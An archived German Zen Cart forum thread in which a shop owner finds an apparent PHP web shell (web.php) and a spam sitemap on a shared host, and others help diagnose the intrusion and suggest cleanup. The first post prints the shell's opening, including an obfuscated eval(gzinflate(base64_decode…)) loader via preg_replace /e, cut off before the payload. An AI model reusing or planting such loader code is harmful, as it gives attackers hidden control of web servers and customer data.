Ankündigung

Einklappen
Keine Ankündigung bisher.

Hacker, gehackt, Sicherheitslücke ?

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

    Hacker, gehackt, Sicherheitslücke ?

    Ich bin mir nicht sicher, ob meine Seite gehackt wurde ? (Shop 1.3.9.h)
    Habe heute folgende Dateien gefunden, kennt jemand diese Dateien ?:

    web.php und Web.sitemap

    Teilauszug: web.php:
    Code:
    <?php
     
    $auth_pass = "5416d7cd6ef195a0f7622a9c56b55e84";
     
    $color = "#df5";
     
    $default_action = 'FilesMan';
     
    $default_use_ajax = true;
     
    $default_charset = 'Windows-1251';
     
    preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65
    Teilauszug: Web.sitemap:

    Code:
         <siteMapNode title="zip laufwerk 100 mb iomega extern 100mb ohne netzteil p 249" description="Aykat Computer ZIP Laufwerk 100

    Ist dies ein Hackerversuch oder ist die Beunruhigung unnötig ?
    Habe beide Dateien gesichert und dann auf der Homepage gelöscht.

    Vielen Dank für Eure Reaktion im voraus.

    Schöne Grüsse,

    Mukadderat

    #2
    Schau dir mal folgenden Link an:



    Suche mal in den großen Suchmaschinen nach c99 shell.

    Was mich noch interessieren würde, wo (Verzeichniss) hast du diese web.php gefunden?
    Zuletzt geändert von jjuno; 05.05.2011, 08:08. Grund: nachtrag

    Kommentar


      #3
      web.php ?

      Danke für die Antwort,
      auf den Link bin ich gestern auch gestossen, da aber der Teil nach "default_charset" anderst ist und dort (Linkseite) auch keine für mich verständliche Hilfe drinsteht kam ich nicht wirklich weiter.
      Die Datei web.php und auch die andere befanden sich im Root-Verzeichnis, also ein Verzeichnis über dem Ordner Shop.

      Ich würde gerne wissen, ob das ein erfolgloser Hackversuch war und der Shop noch unverändert ist und welche Vorkehrungen bzw Änderungen ich nun machen muß. Wie finde ich heraus, ob noch andere Dateien verändert oder abgelegt wurden ? Ist die Version 1.3.9 sonst soweit sicher ?
      Bei den Administratoren im Shop ist keiner dazugekommen.

      Kommentar


        #4
        Das war wohl eher ein erfolgreicher Hack. Die web.php ist meiner Meinung nach eine
        Shell. Die Frage ist ja, was damit bezweckt wird. Da würde ich aber erst den Support
        beim Hoster fragen, was die davon halten.

        Kommentar


          #5
          hatte den Support angeschrieben und warte nun auf die Antwort.
          Danke nochmal.

          Kommentar


            #6
            Mit was ich jetzt gesehen habe ist es kein hack im Zen Cart Shop sondern ein hack bei dein Hoster.

            Bist du auf shared hosting oder ein eigenen VPS oder Dedi?

            Kommentar


              #7
              Solange der Shop nicht infiziert ist bin ich beruhigt, der Rest auf der Homepage ist nicht weiter wichtig und leicht wiederherzustellen.

              Es ist Shared Hosting.

              Kommentar


                #8
                Wer dir eine Shell unterschieben kann, kann auch auf deine Shopdateien zugreifen.

                Kommentar


                  #9
                  genau was jjuno sagt...

                  Zeit vielleicht ein anderen Hoster zu suchen....

                  Kommentar


                    #10
                    @ jjuno
                    das stimmt natürlich.

                    @ eentje
                    war bisher zufrieden und der kümmert sich bisher recht schnell.

                    zumindest habe ich regelmässig eine Sicherung des Shops gemacht.

                    Kommentar


                      #11
                      Habe u.a. folgende Hinweise von meinem Hoster erhalten:

                      " Wenn der Shop die einzige aktive Komponente auf Ihrer Seite ist, bitte nach Sicherheitsupdates umschauen. Bei diesen Angriffen werden meistens alte Sicherheitslücken "ausprobiert" (Script Kiddies). Keine wirkliche Bedrohung, sonder nur lästig. "
                      " Lese und Schreibrechte so verändern das ein unbeaufsichtigter Schreibzugriff nur auf bestimmte Verzeichnisse erfolgen kann. "

                      Ich hatte noch im Root-Verzeichnis folgende Daten:
                      phpinfo.php
                      sitemap.php

                      habe diese nun gelöscht. FTP-Passwort und WEB-Passwort geändert.

                      Weiss aber nicht, ob das nun reicht.

                      Kommentar


                        #12
                        ok... folgendes...

                        es gibt nur zwei weisen um die dateien in dein hosting zu kriegen.

                        1) Du hasst auf dein Rechner ein virus/trojaner/keylogger und so mit hat einer deine FTP passwörter bekommen.

                        2) Dein hoster hat ein Problem und dein stückchen vom Server nicht gut gesichert.

                        Mit Zen Cart hat dieses nichts zu tun.

                        Kommentar


                          #13
                          Also mal ehrlich, wenn das die Meinung deines Hosters ist, würde ich auf alle Fälle der
                          Empfehlung von eentje folgen. Was gibt es für einen Grund einen Shop zu hacken, bzw.
                          den Webspace zu hacken wo einer drauf ist?

                          Weil einem heranwachsenden langweilig ist, oder eher, weil jemand Kreditkartendaten, Paßwörter etc. abgreifen will? Die Antwort kannst du dir selbst aussuchen.

                          Ich würde mal auf alle Fälle dieser Empfehlung folgen:



                          und zusätzlich auch mal mit phpmyadmin in meine Datenbank sehen. Mit dieser Shell,
                          wird man mehr anstellen können, als andere Leute zu belästigen.

                          Viel Spaß beim Aufräumen.

                          Kommentar


                            #14
                            @aykatshop,

                            wie steht es aktuell?

                            Da der Angriff nicht erfolgreich gegen die Version 1.39x war, würde uns interessieren wie
                            der Hack gelaufen ist.

                            War es der Hoster?

                            Mit einer kurzen Mitteilung würdest du uns allen helfen, dem Team weil Sie einen Ansatzpunkt haben zur Vermeidung, den Anwendern weil wir unseren Webspace auf
                            diese Schwachstellen überprüfen könnten.

                            Bitte melde dich.

                            Kommentar


                              #15
                              @ eentje

                              ich arbeite sowohl vom Geschäft aus als auch von zu Hause aus am Shop also an 2-3 Rechnern abwechselnd (es kann also auch an meinem PC gelegen haben).

                              Mein Hoster hat Probleme bei sich ausgeschlossen, da sich zudem kein anderer bei ihm mit irgendwelchen Atacken gemeldet hat.
                              Mein Hoster ist Berlinhosting, der wiederum seine Server bei keyweb stehen hat.

                              @ jjuno

                              ich weiss nicht, ob das mein Fehler ist, da ich ja die Dateien phpinfo.php und sitemap.php auf dem obersten Verzeichnis hatte. Und nicht weiss, wie sicher diese vor Angriffen waren (beide zur Zeit gelöscht).
                              Zudem kann ich auch nicht ausschliessen, ob ich bei dem einen oder anderen Datei die Zugriffsrechte/Schreibrechte falsch gesetzt habe, da man ja immer wieder Änderungen am Shop macht und zugegeben in diesem Bereich Laie ist.
                              Ohne meinen Fehler auszuschliessen kann ich den Hoster nicht verurteilen, wie gesagt war er über die letzten Jahre immer kooperativ und persönlich erreichbar.
                              Die meisten Vorschläge von:

                              hatte ich im voraus schon gemacht.
                              z.B. 1) 2) 4) 5)
                              beide configure.php hatten chmod 444
                              nicht benötigte Admins sind gelöscht
                              lange Passwörter wurden verwendet

                              ... aber sicherlich dürfte nicht alles optimal sein, da sonst ja kein Angriff stattgefunden hätte. Daher muss ich nach dem Angriff noch einiges Ändern.

                              Das Kreditkartenmodul wird nicht benutzt.

                              Abschliessend würde ich webchills bitten sich die Seite anzuschauen, da ich nicht sagen kann, ob es am Hoster an mir oder am Shop lag, wobei ich nicht vermute, daß die Version 1.3.9h unsicher ist.

                              Nochmals ganz herzlichen Dank an alle.

                              Kommentar

                              Info zu diesem Forenarchiv:
                              Mit Release von 1.5.7 wurde die deutsche Zen Cart Version auf eine reine DIY-Lösung umgestellt.
                              Für einen Support via Forum stehen keine personellen und zeitlichen Ressourcen mehr zur Verfügung.
                              Dieses Supportforum bleibt im Nur-Lesen-Modus als Wissensarchiv noch online verfügbar.
                              PM Funktionalität, Registrierung und Posten neuer Beiträge sind deaktiviert.
                              Zugriff auf Anhänge in den Postings ist auch ohne Registrierung/Einloggen möglich.
                              FAQ und Downloadbereich des Forums wurden in die neue umfangreiche Knowledgebase auf der zen-cart-pro.at Website übernommen.

                              Das Development der deutschen Zen Cart Version geht wie bisher auf Github weiter.
                              Wir werden auch weiterhin neue Versionen bereitstellen und die Onlinedokumentation/Knowledgebase aktualisieren.
                              Fehler in der Software können auf Github als Issues gemeldet werden.
                              Follow us
                              aktuelle version
                              Zen Cart 1.5.7h deutsch
                              vom 15.04.2024
                              [Download]
                              Lädt...
                              X